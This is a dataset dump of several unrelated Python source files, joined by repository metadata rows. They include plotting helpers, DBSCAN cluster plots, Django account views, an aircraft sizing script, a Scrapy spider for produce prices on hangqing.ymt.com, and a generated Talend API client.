        figs_per_row: number of subplots per grid row.
    """
    num_plts = np.size(scalo, 0)
    n_rows = np.ceil(num_plts/figs_per_row)
    n_rows = n_rows.astype(int)
    # Fix: squeeze=False keeps axs 2-D even when n_rows == 1; without it,
    # plt.subplots returns a 1-D axes array and axs[r, n] raises IndexError.
    fig, axs = plt.subplots(n_rows, figs_per_row, squeeze=False,
                            gridspec_kw={'hspace': 0, 'wspace': 0})
    fig.suptitle(name)
    # only use outer axes labels
    for ax in axs.flat:
        ax.label_outer()
    for r in range(0, n_rows):
        for n in range(0, figs_per_row):
            curr = r*figs_per_row + n
            if curr < num_plts:
                axs[r, n].plot(scalo[curr, :])
            else:
                break
# generates and plots a graphical object showing the current frame location in the
# clustered reduced dimensionality space
def plot_curr_cluster(t_out, labels, frame, xi, yi):
    """Show the cluster map with a red cross at the embedding of *frame*."""
    fig, ax = plt.subplots()
    # Cluster labels as a background mesh.
    plt.pcolormesh(xi, yi, labels)
    # Rows of t_out are stored (y, x) -- note the swapped unpack order.
    y, x = t_out[frame]
    plt.scatter(x, y, s=10, c='red', marker='+')
    plt.show()
# generates and saves a movie of the t-sne space locations for each frame
def cluster_anim(t_out, labels, xi, yi, fps, start_f=0, end_f=1000):
    """Write 'location_plot.mp4' showing the embedding location for the
    frames in [start_f, end_f)."""
    metadata = dict(title="T-sne Space Plot", artist="matplotlib", comment="Movie of t-sne space locations for each frame")
    writer = FFMpegWriter(fps=fps, metadata=metadata)
    fig, ax = plt.subplots()
    n_frames = end_f - start_f
    with writer.saving(fig, "location_plot.mp4", n_frames):
        for idx in range(start_f, end_f):
            plt.pcolormesh(xi, yi, labels)
            ax.autoscale(False)
            # Rows of t_out are stored (y, x).
            y, x = t_out[idx]
            plt.scatter(x, y, s=10, c='red', marker='+')
            writer.grab_frame()
# helper function for finding the index of the nearest value in an array
# note: this will be slow on large arrays
def find_nearest_index(array, value):
    """Return the index of the element of *array* closest to *value*.

    Linear scan -- slow on very large arrays.
    """
    distances = np.abs(np.asarray(array) - value)
    return distances.argmin()
def plot_ethogram(l_frames):
    """Scatter per-frame behaviour labels over time, coloured by label id."""
    n_frames = np.size(l_frames, 0)
    frame_ids = range(0, n_frames)
    fig, ax = plt.subplots()
    plt.scatter(frame_ids, l_frames, c=l_frames, s=10, cmap='jet')
    plt.show()
# count number of occurances of labels in label array
def count_labels(l_array):
    """Return (unique labels, occurrence counts) for *l_array*."""
    return np.unique(l_array, return_counts=True)
# count consecutive occurances of labels in label array
def count_consecutive_labels(l_array):
    """Return, for every label 0..max, an array of its consecutive run lengths.

    Fixes: the loop used range(0, max) and therefore silently dropped the
    highest label; it now runs to max inclusive. An empty input returns []
    instead of crashing in np.max.
    """
    l_array = l_array.astype(int)
    counts_list = []
    if l_array.size == 0:
        return counts_list
    for i in range(np.max(l_array) + 1):
        bool_arr = l_array == i
        # Mark run boundaries, then every other gap length is a run of True.
        count = np.diff(np.where(np.concatenate(([bool_arr[0]], bool_arr[:-1] != bool_arr[1:], [True])))[0])[::2]
        counts_list.append(count)
    return counts_list
# trim consecutive count arrays to discard short "behaviours"
def trim_counts(counts_list, threshold=5):
    """Drop run lengths shorter than *threshold* from each array; the
    returned arrays are sorted ascending."""
    result = []
    for arr in counts_list:
        ordered = np.sort(arr)
        result.append(ordered[ordered >= threshold])
    return result
# plot a set of counts as histograms
def plot_label_counts(counts_list, plots_per_row=3, name='Label Counts', color='blue'):
    """Histogram each label's run-length counts in a grid of subplots.

    Args:
        counts_list: list of 1-D arrays (one per label).
        plots_per_row: subplots per grid row.
        name: figure title.
        color: histogram bar colour.
    """
    # Find the global maximum so all histograms share one set of bins.
    max_count = 0
    for count in counts_list:
        if count.any():
            curr_max = np.max(count)
            if curr_max > max_count:
                max_count = curr_max
    num_plots = len(counts_list)
    n_rows = np.ceil(num_plots/plots_per_row)
    n_rows = n_rows.astype(int)
    bins = range(0, max_count+1)
    # Fix: squeeze=False keeps axs 2-D even when n_rows == 1; without it,
    # plt.subplots returns a 1-D axes array and axs[r, n] raises IndexError.
    fig, axs = plt.subplots(n_rows, plots_per_row, squeeze=False,
                            gridspec_kw={'hspace': 0, 'wspace': 0})
    fig.suptitle(name)
    # only use outer axes labels
    for ax in axs.flat:
        ax.label_outer()
    for r in range(0, n_rows):
        for n in range(0, plots_per_row):
            curr = r*plots_per_row + n
            if curr < num_plots:
                axs[r, n].hist(counts_list[curr], bins=bins, color=color)
            else:
                break
| [
"[email protected]"
] | |
eeafb0a33b32e58aaead1a0011773f833e20579c | 9628ef262c61ede2c7490920681c063bf1682ea7 | /db_clustering/plots.py | a7ca9927c58f6a4b64e393413f351fc755dc68f5 | [] | no_license | schnappv/density-based-clustering | 6c15457c25c101340acf137f4483527b5b01444f | 1ad542b5d7789da782f2b9771d837a64adaee674 | refs/heads/master | 2023-07-27T00:20:52.464045 | 2022-06-28T14:37:44 | 2022-06-28T14:37:44 | 235,692,188 | 0 | 1 | null | 2023-07-06T21:49:52 | 2020-01-23T00:00:40 | Jupyter Notebook | UTF-8 | Python | false | false | 3,472 | py | import logging
from typing import Optional, List
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from matplotlib.ticker import MaxNLocator
from pandas.plotting import register_matplotlib_converters
from db_clustering.base_dbscan import BaseDBSCAN
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def plot_noise(
dbscan_obj: BaseDBSCAN,
title: Optional[str] = None,
x_label: Optional[str] = None,
y_label: Optional[str] = None,
):
"""
Plots the data and circles the points that are determined as outliers or
anomalies
Args:
dbscan_obj: A fitted dbscan object
x_label: a label for the x axis
y_label: a label for the y axis
Returns:
fig, ax
"""
outlier_x, outlier_y = dbscan_obj.outlier_report()
fig, ax = _plot_params(title, x_label, y_label)
plt.scatter(dbscan_obj.obs_x, dbscan_obj.obs_y, color="b", marker="x")
plt.scatter(outlier_x, outlier_y, s=200, facecolors="none", edgecolors="r")
plt.legend(["Observed", "Detected Noise"])
return fig, ax
def plot_clusters(
dbscan_obj: BaseDBSCAN,
title: Optional[str] = None,
x_label: Optional[str] = None,
y_label: Optional[str] = None,
colors: Optional[List[str]] = None,
):
"""
Plots the data and circles the different clusters and noise points
Args:
dbscan_obj: A fitted dbscan object
x_label: a label for the x axis
y_label: a label for the y axis
colors: a list of strings representing colors to represent each cluster
Returns:
fig, ax
"""
clusters = dbscan_obj.detect_clusters()
outlier_x, outlier_y = dbscan_obj.outlier_report()
n_clusters_ = len(set(clusters)) - (1 if -1 in clusters else 0)
fig, ax = _plot_params(title, x_label, y_label)
plt.scatter(dbscan_obj.obs_x, dbscan_obj.obs_y, color="k", marker="x")
if colors is None:
colors = ["b", "g", "orange", "purple", "gold"]
for i in range(n_clusters_):
ilocs = np.where(clusters == i)
cluster_i_x = dbscan_obj.obs_x[ilocs]
cluster_i_y = dbscan_obj.obs_y[ilocs]
plt.scatter(
cluster_i_x,
cluster_i_y,
s=200,
facecolors="none",
edgecolors=colors[i],
)
plt.scatter(outlier_x, outlier_y, s=200, facecolors="none", edgecolors="r")
labels = ["Cluster {}".format(str(i + 1)) for i in range(n_clusters_)]
labels = ["Observed"] + labels + ["Detected Noise"]
plt.legend(labels)
return fig, ax
def _plot_params(title: str, x_label: str, y_label: str):
"""
Establishes parameters for the plots to all be consistent
Args:
title: a title for the plot
x_label: a label for the x axis
y_label: a label for the y axis
Returns:
fig, ax
"""
sns.set_style("white")
register_matplotlib_converters()
fig, ax = plt.subplots(figsize=(10, 5))
ax.yaxis.set_major_locator(MaxNLocator(integer=True))
plt.tick_params(bottom=True, left=True, labelleft=True, labelbottom=True)
if x_label is not None:
plt.xlabel(x_label, fontsize=15, color="k")
if y_label is not None:
plt.ylabel(y_label, fontsize=15, color="k")
if title is not None:
plt.title(title, fontsize=20, color="k")
return fig, ax
| [
"[email protected]"
] | |
e1266db15e249a1e84da1b930047cfc7169dce2e | b29f16ffd36eb64d98a0008e64c582d7c23697ea | /Account/views.py | e561deb9663b8ddba4ae43b2f19dc1c5d71d2663 | [] | no_license | minhvu2899/B0EC | 019bb744857aa66ee50c4b9ca0f2cb9d097180b9 | 2653653f68d2ac4a8f911214b9a4a3f02f842219 | refs/heads/main | 2023-06-04T06:41:11.767476 | 2021-06-23T15:07:39 | 2021-06-23T15:07:39 | 379,642,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,591 | py | from django.http.response import HttpResponse
from django.shortcuts import redirect, render
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout as logouts
from django.contrib.auth import login as logins
from django.contrib.auth import authenticate
from django.contrib.auth import get_user_model
from Account.models import SignUpForm
from user.models import CustomerUser
# Create your views here.
def index(request):
if not request.user.is_authenticated:
return redirect("account:login")
return render(request,"homepage/home-page.html",{"user":request.user})
def register(request):
User = get_user_model()
print(User)
if request.method=='POST':
form=SignUpForm(request.POST)
if form.is_valid():
form.save()
return redirect("account:login")
else:
form =SignUpForm()
return render(request,"Account/register.html",{"form":form})
def login(request):
if request.method=='POST':
form=AuthenticationForm(data=request.POST)
if form.is_valid():
user = authenticate(username=request.POST.get('username'),password=request.POST.get('password'))
if user is None:
return HttpResponse("Tai khoan khong ton tai")
logins(request,user)
return redirect('core:index')
else:
form=AuthenticationForm()
return render(request,"Account/login.html",{"form":form})
def logout(request):
logouts(request)
return redirect('/') | [
"[email protected]"
] | |
8308d8158367a20c31afa31998a2f7eb48b3601e | faaf763f55bade3b73a320d841fa4cb3a19d1884 | /src/dygie_ent/__init__.py | 48dce1901649ff8a80ca4be6df1cfbf485fad62f | [] | no_license | jeremytanjianle/few-shot-active-learner | 57bb552871d436890c9c088b42aa14a8ca979608 | 3bf1b1ccdccfe43747d5de5cbaa550b3c5d85f37 | refs/heads/main | 2023-04-26T16:14:00.572067 | 2021-05-26T14:10:58 | 2021-05-26T14:10:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from .model import Dygie_Ent | [
"[email protected]"
] | |
4912c9aa0169725dec897c3ad6b60c8d226faa63 | 8f6119f0e31b49b45a500435f509e76718a6d34f | /venv/Scripts/pip3-script.py | 45f2ff25911187d97095b29c72a85b088dbafee3 | [] | no_license | reyhanzo/PROGJAR_05111740000154 | ff4f4d7b519be6b24b4538b303d8883174b1a8fa | 77a6fde75f8f8700725fc52c4c80b9aa88ac4d53 | refs/heads/master | 2021-01-02T03:02:11.379409 | 2020-05-15T15:53:28 | 2020-05-15T15:53:28 | 239,463,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #!C:\Users\LENOVO\Documents\GitHub\PROGJAR_05111740000154\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
3242d0126d4fef0df4997284cec8c9188b7e3d1f | 3835677a1e44a7c9de8bc1c0fba7df94caaf4b16 | /app/modelo/migrations/0005_auto_20190112_2117.py | 53c98283d8eb26883207b4b28664b83a77d0fd26 | [] | no_license | JonnathanE/cooperativa | cf3f42c112b05120599b261460f88fc6ee7a32bf | 9a7c92eb51b7f91c348f38919772e2c83f993d9c | refs/heads/master | 2020-04-17T04:51:52.799529 | 2019-01-17T15:52:33 | 2019-01-17T15:52:33 | 166,249,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | # Generated by Django 2.1.4 on 2019-01-12 21:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('modelo', '0004_auto_20190109_0413'),
]
operations = [
migrations.AlterField(
model_name='bancavirtual',
name='numeroCuentaDestino',
field=models.CharField(max_length=20),
),
]
| [
"[email protected]"
] | |
b44afe41d7c0420888c16fb1296fb8feeb61c675 | 1d4fdcc3ad5a18841da84c9dc9a1838aa4129d40 | /For First Design/aircracft.py | f0c36bce1c5d43a04a18033b2796cff14d929cec | [] | no_license | aneax/fixed_wing | fca20b8d80754ff07d39403d9eefed656ef92129 | 0f56302113f329ecd1c417b4ef9f549590d1bf2d | refs/heads/master | 2021-10-28T03:24:33.212703 | 2019-04-21T08:51:32 | 2019-04-21T08:51:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,587 | py | import math
import atmosphere
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
f=open('output.txt','w')
n=5
stall_margin=7 #m/s
#def round_value(func):
# return round(func,n)
##%% Mission Requirements
#f.write("Mission Requirements\n\n")
#endurance=0 #min
#f_range=30 #km
#stall_margin=7 #m/s
#min_airspeed=10 #m/s
#
#f.write('Endurance:{} min\t\tFlight Range:{} km\t\tStall Margin:{} m/s\t\tMinimum Airspeed:{} m\s\n '.format(endurance,f_range,stall_margin,min_airspeed))
#%% Payload Requirements
payload_mass=1 #kg
payload_power=0 #W
f.write('Pay Load Requirements\nPayload Mass:{} kg\t\tPayload Power Requirements:{} Watt\n'.format(payload_mass,payload_power))
#%% Aircraft
airframe_mass=1.952 # kg
avionics_power=0 #W
fuselage_drag_coeff=0.03
zero_lift_drag_coeff=0.02
f.write('\nAircraft Requirements\nAirframe Mass:{} kg\t\tAvionics Power:{} Watt\t\tFuselage Drag Coefficient:{} \t\tZero Lift Coefficient "C_Do":{}\n'.format(airframe_mass,avionics_power,fuselage_drag_coeff,zero_lift_drag_coeff))
#%% Cruise Speed
cruise_speed=25 #m/s
cruise_altitude=2500 #m
#%% Environment
air_density,air_temperature=atmosphere.densityGradient(cruise_altitude)
#air_density=1.11
#print('Air Density:{} kg/m3'.format(air_density))
f.write('\nCruise Data\nCruise Speed:{} m/s\t\tCruise Altitude:{} m\t\tAir Density:{} kg/m3\t\t\nAir Temperture:{} K\n'.format(cruise_speed,cruise_altitude,round(air_density,n),round(air_temperature,n)))
#%% Propulsion and Batteries Inputs
battery_capacity=5300 #mah
battery_mass_single=.512 #kg
cell_volatage=4.2 #V
cell_in_series=4
no_of_batteries=2
total_capacity_used=90 # %
overall_efficiency= 100# %
f.write('\nBattery and Propulsion Inputs\nBattery Capacity:{} mAh\t\tSingle Battery Mass:{} kg\t\tCell Voltage:{} V\t\tCell in Series:{}\nNumber of Battery:{}\t\t\t\tTotal Capacity Used:{} %\t\t\tOverall Propulsive Efficiency:{}\n'.format(battery_capacity,battery_mass_single,cell_volatage,cell_in_series,no_of_batteries,total_capacity_used,overall_efficiency))
#%% WIng Inputs
wing_loading= 12.5 #%%kg/m2
aspect_ratio=8
taper_ratio=0.8
oswald_efficiency=1.78*(1-0.045*np.power(aspect_ratio,0.68))-0.64
max_lift_coefficient=1.5
f.write('\nWing Inputs\nWing Loading:{} kg/m2\t\tAspect Ratio:{}\t\tTaper Ratio:{}\t\tOswald Efficiency "e":{}\nMax Lift Coefficient "c_Lmax":{}\n'.format(wing_loading,aspect_ratio,taper_ratio,oswald_efficiency,max_lift_coefficient))
#%% Calculations
total_battery_capacity=no_of_batteries*battery_capacity
#print('Total Battery Capacity:{} mAh'.format(total_battery_capacity))
voltage=cell_volatage*cell_in_series
#print('Total Voltage:{} V:'.format(voltage))
battery_mass=no_of_batteries*battery_mass_single
#battery_mass=voltage*battery_capacity/energy_density/1000*no_of_batteries
#print('Battery mass:',battery_mass)
#total_mass=payload_mass+airframe_mass+battery_mass
total_mass=3.5
#print('Total Mass "m":',total_mass)
f.write('\nBattery Calculations\nTotal Battery Capacity:{} mAh\t\tTotal Voltage:{} V\t\tTotal Battery Mass:{} kg\n'.format(total_battery_capacity,voltage,battery_mass))
f.write('\nTotal Aircraft Mass:{} kg\n'.format(total_mass))
#%% Main Wing
wing_area=total_mass/wing_loading
b=(aspect_ratio*wing_area)**0.5/2
#print('Wing Area "S":',wing_area)
#print('Semi_span "b":',b)
root_chord=(2*wing_area)/(2*b*(1+taper_ratio))
#print('root_chord:',root_chord)
tip_chord=taper_ratio*root_chord
#print('Tip Chord:',tip_chord)
avg_chord=(tip_chord+root_chord)/2
#print('Average Chord:',avg_chord)
f.write('\nWing Calculations\nWing Area:{} m2\t\tSpan:{} m\t\tSemi-Span:{} m\nRoot Chord:{} m\t\tTip Chord:{} m\n'.format(round(wing_area,n),round(2*b,n),round(b,n),round(root_chord,n),round(tip_chord,n)))
#%%
mass_fraction=(battery_mass+payload_mass)/total_mass
#print('Mass Fraction:',mass_fraction)
f.write('Mass Fraction:{} %\n'.format(round(mass_fraction,n)*100))
k=1/(math.pi*oswald_efficiency*aspect_ratio)
min_drag_airspeed=(2*total_mass*9.81/(air_density*wing_area))**0.5*(k/(zero_lift_drag_coeff+fuselage_drag_coeff))**0.25
#print('Minimum Drag Speed "Vm":',min_drag_airspeed)
min_power_airspeed=min_drag_airspeed*1/(3)**(1/4)
#print('Minimum Power Speed "Vmp":',min_power_airspeed)
min_air_stallspeed=((2*total_mass*9.81)/(air_density*wing_area*max_lift_coefficient))**0.5
#print('Stall Speed "Vmin":',min_air_stallspeed)
stall_margin_calculated=cruise_speed-min_air_stallspeed
f.write('\nSpeed Calculations\nMinimum Drag Speed:{} m/s\t\tMinimum Power Speed:{} m/s\t\tStall Speed:{} m/s\n'.format(round(min_drag_airspeed,n),round(min_power_airspeed,n),round(min_air_stallspeed,n)))
c=0
#%% Lift Drag Calculation
def lift_drag_propulsion(velocity,c):
c_L=((2*total_mass*9.81)/(air_density*wing_area*velocity**2))
#print('Lift Coefficient "cL":',c_L)
c_D=zero_lift_drag_coeff+fuselage_drag_coeff+c_L**2*k
#print('Drag Coefficient "c_D":',c_D)
drag=0.5*c_D*wing_area*air_density*velocity**2
#print('Drag in newton":',drag)
lift=drag*c_L/c_D
#print('Lift in newton:',lift)
lift_to_drag=c_L/c_D
#print("Lift/Drag:",lift_to_drag)
propulsive_power_required=drag*velocity/(overall_efficiency/100)
i_prop=propulsive_power_required/voltage
#print('Current Required for propeller:',i_prop)
#%% Current Required
i_avio=avionics_power/voltage
i_pay=payload_power/voltage
total_current_required=i_prop+i_avio+i_pay
time_of_flight=(total_battery_capacity/1000)*(total_capacity_used/100)/(i_prop+i_pay+i_avio)
#print('Time of flight in minutes:',time_of_flight*60)
total_range=time_of_flight*velocity
#print('Total_range in km:',total_range*3600/1000)
if c==0:
print('Propulsive Power Required',propulsive_power_required)
f.write('\nLift Drag Calculations\nCoefficient of Lift "c_L":{}\t\tCoefficient of Drag "c_D":{}\t\tDrag:{} N\nLift:{} N\t\t\t\t\t\tLift to Drag Ratio "L/D":{}\n'.format(round(c_L,n),round(c_D,n),round(drag,n),round(lift,n),round(lift_to_drag,n)))
f.write('\nStall Margin:{} m/s\t\tPropulsive Power Required:{} Watt\n'.format(round(stall_margin_calculated,n),round(propulsive_power_required,n)))
f.write('\nCruise Propeller Current Requirement:{} A\t\tAvionics Current Requirement:{} A\nPayload Current Requirement:{}\t\t\t\t\t\tTotal Current Requirement:{} A\n'.format(round(i_prop,n),round(i_avio,n),round(i_pay,n),round(total_current_required,n)))
f.write('\nTime of Flight:{} min\t\tTotal Range:{} km\n'.format(round(time_of_flight*60,n),round(total_range*3600/1000,n)))
c=c+1
return propulsive_power_required,time_of_flight,total_range,drag,lift
propulsive_power_required,time_of_flight,total_range,drag,lift=lift_drag_propulsion(cruise_speed,c)
#print('Calculated Stall Margin:',stall_margin_calculated)
#%% Requriement Fulfilled
#range_re=f_range-total_range*3600/1000
#endurance_re=endurance-time_of_flight
#f.write('\n\nRange Requirement Fulfillment:{}\n'.format(range_re))
#%% Propeller Design
dia=0.254 #m
import propeller_design as pd
power,v_1,effi=pd.propeller_design(drag,cruise_speed,cruise_altitude,dia)
f.write('\n\nPropeller Design\nPropeller Shaft Power:{} Watt\t\tPropeller Outlet Velocity:{} m\s\t\tEfficieny:{}\n'.format(round(power,n),round(v_1,n),round(effi,n)))
#%%
f.close()
#%% Plot Generation
f1=open('output_plot.txt','w')
for v in range(6,41):
propulsive_power_required,time_of_flight,total_range,drag,lift=lift_drag_propulsion(v,2)
f1.write('{}\t{}\t{}\t{}\t{}\t{}\n'.format(v,round(time_of_flight*60,n),round(total_range*3600/1000,n),round(propulsive_power_required,n),round(drag,n),round(lift,n)))
f1.close()
f2=open('output_plot.txt','r')
x=[]
y=[]
z=[]
pr=[]
d=[]
l=[]
for line in f2:
p = line.split()
x.append(float(p[0]))
y.append(float(p[1]))
z.append(float(p[2]))
pr.append(float(p[3]))
d.append(float(p[4]))
l.append(float(p[5]))
plt.figure(1)
plt.plot(1)
plt.plot(cruise_speed*np.ones(2),[1,np.max(y)+50],label='cruise speed')
plt.plot(min_air_stallspeed*np.ones(2),[1,np.max(y)+50],label='min speed')
plt.plot(x,y,label='time of flight "min"')
plt.plot(x,z,label='range "km"')
#
plt.xlabel('Velocity m/s')
plt.ylabel('Flight Time and Range')
plt.legend(bbox_to_anchor=(0.5, 1), loc=2, borderaxespad=0.)
plt.figure(2)
plt.plot(x,pr)
plt.xlabel('Velocity m/s')
plt.ylabel('Propulsive Power Required')
plt.figure(3)
plt.plot(x,d,label='Drag')
plt.plot(x,l,label='Lift')
plt.xlabel('Velocity m/s')
plt.ylabel('Lift Drag "N"')
plt.legend(bbox_to_anchor=(0.5, 1), loc=2, borderaxespad=0.)
#l=np.array(l)
l_d=np.divide(l,d)
plt.figure(4)
plt.plot(x,l_d)
plt.xlabel('Velocity m/s')
plt.ylabel('Lift/Drag')
plt.show()
| [
"[email protected]"
] | |
ab82ba1b699e55a93be8f6d23f9c77bc8b1121a2 | c5370d05e8b07e78bab362c91fbab70f1cbba22a | /FruitFree/spider/yimutian/yimutian/spiders/yimutian_locationchart.py | dd39e68253a57f4b62f9332a9f0ac70d9b06279b | [] | no_license | YihengWang828/FruitFreedom | 21c540a1d049684bc63440f6090034210fabfd45 | 489fd82b754196f7312960bf75c2bc213c4c0e88 | refs/heads/master | 2022-11-11T05:21:15.952454 | 2020-06-27T15:08:34 | 2020-06-27T15:08:34 | 273,426,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,710 | py | import scrapy
import re
import json
from bs4 import BeautifulSoup
from copy import deepcopy
import os
import csv
import time
from yimutian.items import YimutianItem
#from products.items import ProductsItem
class yimutianSpider(scrapy.Spider):
name='yimutian'
allowed_domains = ['hangqing.ymt.com']
def start_requests(self):
headers={
"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
}
url='http://hangqing.ymt.com/chandi/'
yield scrapy.Request(url=url,callback=self.parse,headers=headers,dont_filter=True)
def parse(self,res):
#print(res.text)
soup=BeautifulSoup(res.text,'lxml')
wrapper=soup.find(id='purchase_wrapper')
a_shuiguo=wrapper.find_all('a')
#print(a_shuiguo[1])
headers={
#"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
}
yield scrapy.Request(url='http://hangqing.ymt.com/common/nav_chandi_'+a_shuiguo[1]['data-id'],callback=self.parse_1,headers=headers,dont_filter=True)
def parse_1(self,res):
soup=BeautifulSoup(res.text,'lxml')
cate_detail_all=soup.find_all(class_=re.compile('cate_detail_con'))
headers={
"Referer": "http://hangqing.ymt.com/chandi_8426_0_-1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
"Cache-Control": "no-cache"
}
as_=[]
for i in range(1,7):
print(3)
cate_detail_one=cate_detail_all[i]
lis=cate_detail_one.find_all('li')
#print(len(lis))
for li in lis:
a=li.find(href=re.compile('http'))
#print(a)
as_.append(a)
print(len(as_))
for a in as_:
item=YimutianItem()
item['name']=a.string
item['data_id']=a['data-id']
item['href']=a['href']
#yield scrapy.Request(item['href'],callback=self.parse_2,meta={"item":deepcopy(item)})
form_data={
"locationId":"0",
"productId":item["data_id"],
"breedId":"0"
}
print(1)
#print(form_data)
yield scrapy.FormRequest(
"http://hangqing.ymt.com/chandi/location_charts",
formdata=form_data,
callback=self.parse_3,
meta=item,
dont_filter=True
)
def parse_3(self,res):
print(2)
items=res.meta
print(items)
item=YimutianItem()
item['name']=items['name']
item['href']=items['href']
item['data_id']=items['data_id']
html_str=json.loads(res.text)
status=html_str['status']
if status==0:
dataList=html_str["data"]["dataList"]
item['title']=html_str["data"]["title"]
item['type_']=0
for data in dataList:
if type(data)==type([]):
item["province_name"]=data[0]
item["province_price"]=data[1]
elif type(data)==type({}):
item["province_name"]=data["name"]
item["province_price"]=data["y"]
yield item
| [
"[email protected]"
] | |
1e1edc52a0391978d201fa29915e76ea3b59a2c1 | 82adfe2b2b6bc3989f8b860513d5ee4b753987e3 | /pytmcapi/swagger_client/api/promotions__executables_api.py | 8d566fd25748ef0010aab5e51e9c5630fa905a1b | [
"Apache-2.0"
] | permissive | mverrilli/tmc-api-clients | 9ffc520a21b791d5047dfd74050af9bd6268b7a5 | 0d2752a4c2f43b19da9714072d03c15dccf2619a | refs/heads/master | 2021-05-17T22:45:38.453946 | 2020-04-06T16:32:40 | 2020-04-06T16:32:40 | 250,986,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,980 | py | # coding: utf-8
"""
Talend Management Console Public API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class PromotionsExecutablesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_executable_details(self, id, **kwargs): # noqa: E501
"""Get Promotion details # noqa: E501
Get Promotion details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executable_details(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: executable ID (required)
:return: PromotionExecutableDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_executable_details_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_executable_details_with_http_info(id, **kwargs) # noqa: E501
return data
def get_executable_details_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Promotion details # noqa: E501
Get Promotion details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executable_details_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: executable ID (required)
:return: PromotionExecutableDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_executable_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_executable_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Basic Authentication'] # noqa: E501
return self.api_client.call_api(
'/executables/promotions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PromotionExecutableDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_executables_available(self, **kwargs): # noqa: E501
"""Get available Promotions # noqa: E501
Get available Promotions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executables_available(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str s: search query (FIQL format), e.g. \"name==dev to prod*\"
:return: list[PromotionExecutableInfo]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_executables_available_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_executables_available_with_http_info(**kwargs) # noqa: E501
return data
def get_executables_available_with_http_info(self, **kwargs): # noqa: E501
"""Get available Promotions # noqa: E501
Get available Promotions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_executables_available_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str s: search query (FIQL format), e.g. \"name==dev to prod*\"
:return: list[PromotionExecutableInfo]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['s'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_executables_available" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
